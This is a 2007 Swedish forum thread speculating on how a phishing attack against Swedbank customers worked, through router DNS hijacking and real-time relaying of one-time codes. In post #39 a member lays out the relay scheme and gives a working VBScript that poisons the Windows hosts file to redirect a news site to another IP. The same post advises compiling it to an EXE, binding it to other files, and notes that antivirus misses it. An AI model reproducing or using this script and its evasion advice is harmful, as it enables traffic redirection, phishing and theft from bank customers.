Flashback bygger pepparkakshus!
  1. Dator och IT
  2. IT-säkerhet

Phishing-attack mot Swedbank

Svara
  • 3
  • 4
2007-03-31, 18:18
  #37
milw0rm
Bannlyst
Citat:
Ursprungligen postat av Dr.Ding
Hörde att den här attacken kan vara en dimridå för att sammarbetspartners med flit utnyttjar detta och tömmer sina egna konton.

Banken i fråga har redan gått ut med att alla som förlorat pengar får tillbaka dem...

Klart det är
Citera
2007-03-31, 18:24
  #38
fo0
Medlem
Citat:
Ursprungligen postat av phrank
http://hd.se/ekonomi/2007/03/28/swed...er-drabbas-av/

Undras vad man uppmanas att göra? Kan väl tänka mig att man går upp på en falsk sida, loggar in på en falsk internetbank där personnummer + kod registreras. Men hur kan dem generera kontrollnummret som behövs isf?

Edit: Kontrollnumret kan ju klart fås genom att skicka de uppgifter offret ger ut till den riktiga internetbanken och mata det till den falska sidan.


Det finns en del elak kod för att lura folk att tro att de är inne på en officiell sida. Ett sätt att se efter att man inte är drabbad är att ta en titt på hosts filen. I win XP finns den i
c:\Windows\system32/drivers/etc/hosts

Man kan även komma in på ett konto med så kallad session hijacking. För att undivka detta är det bra att man har lite koll på sina cookies.
Citera
2007-04-01, 19:55
  #39
Rikkez
Medlem
Windows host file
Citat:
Ursprungligen postat av Fonsan
det är bara göra en kopia av hemsidan och när du loggar in startar ett perl script eller liknande som loggar in med samma lösen etc
När den kod som krävs uppenbarar sig för scriptet skickar den det vidare till
webservern som printar ut samma kod till användaren

Användaren skickar vidare sin kod från dosan som scripetet använder för
att komma in. När sedan scriptet skall "skapa" ett nytt konto att flytta pengar till eller likn kan det ju använda kreativiteten och printa att du skrev in fel kod
första gången och får en ny kod som är för kontot

sedan upprepar du ovan prodedur fast med den kod som behövs för
att transaktionen skall gå igenom

det spelar ingen roll vad användaren gör under sessionen bara att
scriptet hinner få 3 st kodsvar
1. Inlogg
2. Kontot
3. Bekräfta

Alltså scriptet surfar runt på den riktiga sidan och genererar fram sidor åt
användaren som glatt ser www.swedbank.se i fältet då dns är manipulerad i routern.

Detta är hur jag föreställer mig att attacken går till

aah just det trojanen är för att logga in på routern och ändra dns
just problemet med default lösen på routrar är ganska kritisk
och att sitta och bruteforca en är heller inte ett problem så det är det som
är svagheten i systemet.

jag tror vi kommer få se mer DNS baserade riktade attacker mot
användare närmsta tiden inte bara inom banker

Allt ovan är enbart i undervisande syfte och jag uppmanar inte till brott

Mvh


Att omdirigera en webbsidas DNS till en helt annan sida på internet är enkelt.

Tex. När man surfar till www.aftonbladet.se så kommer man till www.free6.com

Detta gör man genom att ändra i host filen som finns under C:\WINDOWS\system32\drivers\etc

Detta kan göras antingen manuellt eller via script.

Detta script dirigerar om www.aftonbladet.se till 213.88.151.196 (free6.com)

Ett exempel på vbs script kan se ut så här.

Kod:
Kod: 
On Error Resume Next 
Const ForRead = 1 '*Opens file for reading 
Const ForWriting = 2 '*Opens file for writing, overwriting file 
Const ForAppend = 8 '*Opens file for Appending 

strComputer = "." '* This computer 
'* Connect to the WMI Service 
Set objWMIService = GetObject("winmgmts:" _ 
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 

'* Open the host File 
Set objFSO = CreateObject("Scripting.FileSystemObject") 
Set objFile1 = objFSO.OpenTextFile("C:\Windows\System32\Drivers\Etc\hosts", ForRead) 
Set objFile2 = objFSO.CreateTextFile("C:\Windows\System32\Drivers\Etc\temphosts") 
Dim boolFound 
boolFound = False 

Do Until objFile1.AtEndOfStream 
'* Read line from input file 
strLine = objFile1.ReadLine  
objFile2.Writeline strLine 
Loop 
If boolFound = False then 
objFile2.Writeline strServerIP & "213.88.151.196	www.aftonbladet.se" 
End If 
objFSO.Copyfile "C:\Windows\System32\Drivers\Etc\temphosts", "C:\Windows\System32\Drivers\Etc\hosts" 
objFile1.Close 
objFile2.Close


Vill man sen göra det ännu mer avacerat så kan man kompilera om det till en EXE fil och binda ihop den med andra filer.

I dags läget reagerar inte Antivirus program på detta.

Mer info om hostfilen hittar ni på Google
Citera
2007-04-02, 11:09
  #40
darild
Medlem
http://www.prosecta.se/routerattack.pdf

för er som är intresserade av att läsa avhandlingen. De förutsätter rätt mycket för att det skall fungera, men i teorin så är det helt möjligt. Intressant läsning, även om rapporten har lite script-kiddie-varning över sig (speciellt sista raden "vågar ni surfa på internet nu?" )
Citera
2007-04-02, 19:01
  #41
fo0
Medlem
Citat:
Ursprungligen postat av darild
http://www.prosecta.se/routerattack.pdf

för er som är intresserade av att läsa avhandlingen. De förutsätter rätt mycket för att det skall fungera, men i teorin så är det helt möjligt. Intressant läsning, även om rapporten har lite script-kiddie-varning över sig (speciellt sista raden "vågar ni surfa på internet nu?" )

Jo just det "vågar ni surfa på Internet" och så kom det en .pdf länk ->xss , xss, xss ...lol
Citera
2007-04-02, 19:09
  #42
blueCommand
Medlem
blueCommands avatar
Kanske lite OT men:
http://www.avigsidan.com/avigsidan/ipict/fraud.jpg
Citera
2007-04-02, 19:20
  #43
Munah
Medlem
Citat:
Ursprungligen postat av DaVajj
Man uppmanades öppna och köra en bifogad fil vid namn ssl3.exe.



Dum man får va--

Citat:
Ursprungligen postat av blueCommand
Kanske lite OT men:
http://www.avigsidan.com/avigsidan/ipict/fraud.jpg

que`?
Citera
Svara
  • 3
  • 4

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in